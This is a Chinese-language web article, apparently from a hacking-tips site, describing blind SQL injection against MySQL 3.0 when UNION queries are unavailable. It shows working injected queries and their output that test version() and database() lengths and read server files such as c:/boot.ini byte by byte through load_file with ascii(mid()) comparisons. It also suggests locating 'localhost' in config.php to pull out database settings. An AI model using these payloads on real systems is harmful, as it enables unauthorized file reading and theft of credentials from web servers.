关于mysql 3.0的注射的一点思路

所属分类: 实用技巧 / 漏洞研究 阅读数: 1684
收藏 0 赞 0 分享
mysql 3.0的注射  

对mysql的注射主要是靠union 的联合查询,但union只对版本4。0以上的有用,对3。0以下的就没用了。。。。。。。。。。  

所以在mysql 3.0的数据库里没办法使用union进行跨表查询,但可以使用load_file  
但是也不可以直接使用union替换出来。 下面就是我的一点思路:  

得到版本:  
mysql> select * from user where userid=1 and length(version())<10;  
Empty set (0.00 sec)  

mysql> select * from user where userid=1 and length(version())<1777;  
+--------+----------+----------+  
| userid | username | password |  
+--------+----------+----------+  
| 1 | angel | mypass |  
+--------+----------+----------+  
1 row in set (0.00 sec)  

得到当前数据库:  
mysql> select * from user where userid=1 and length(database())>0;  
+--------+----------+----------+  
| userid | username | password |  
+--------+----------+----------+  
| 1 | angel | mypass |  
+--------+----------+----------+  
1 row in set (0.00 sec)  

暴取文件代码:  
mysql> select * from user where userid=1 and ascii(mid(load_file('c:/boot.ini'),1,1))<1;  
Empty set (0.05 sec)  

mysql> select * from user where userid=1 and ascii(mid(load_file('c:/boot.ini'),1,1))>1;  
+--------+----------+----------+  
| userid | username | password |  
+--------+----------+----------+  
| 1 | angel | mypass |  
+--------+----------+----------+  
1 row in set (0.00 sec)  

因为工作量大,可以用程序来实现(不过也很麻烦)  
另外思路: 可以先使用字符处理函数得到"特殊字符的位置",如我们暴的是config.php文件我们就可以选取"localhost"(或其他)为特殊字符,先得到所在的位置(在哪个字节),在去猜它附近的,这样可以省去不少工作量。  
更多精彩内容其他人还在看

悬念音乐程序安装程序写马(图)

悬念音乐程序安装程序写马(图)
收藏 0 赞 0 分享

为什么经常被网络入侵?探究原因

为什么经常被网络入侵?探究原因
收藏 0 赞 0 分享

黑客之门的魅力:感染与加载(图)

黑客之门的魅力:感染与加载(图)
收藏 0 赞 0 分享

诱人视频请君入瓮 解析RealPlayer溢出漏洞

诱人视频请君入瓮 解析RealPlayer溢出漏洞
收藏 0 赞 0 分享

漏洞漫舞的飞骋

漏洞漫舞的飞骋
收藏 0 赞 0 分享

穷追猛打:破译Foxmail“密码天书”

穷追猛打:破译Foxmail“密码天书”
收藏 0 赞 0 分享

BBSXP漏洞再探究

BBSXP漏洞再探究
收藏 0 赞 0 分享

安全技术—RSA公钥密码体制安全性分析

安全技术—RSA公钥密码体制安全性分析
收藏 0 赞 0 分享

蜜罐技术:消除防火墙局限和脆弱

蜜罐技术:消除防火墙局限和脆弱
收藏 0 赞 0 分享

跨站脚本说明

跨站脚本说明
收藏 0 赞 0 分享
查看更多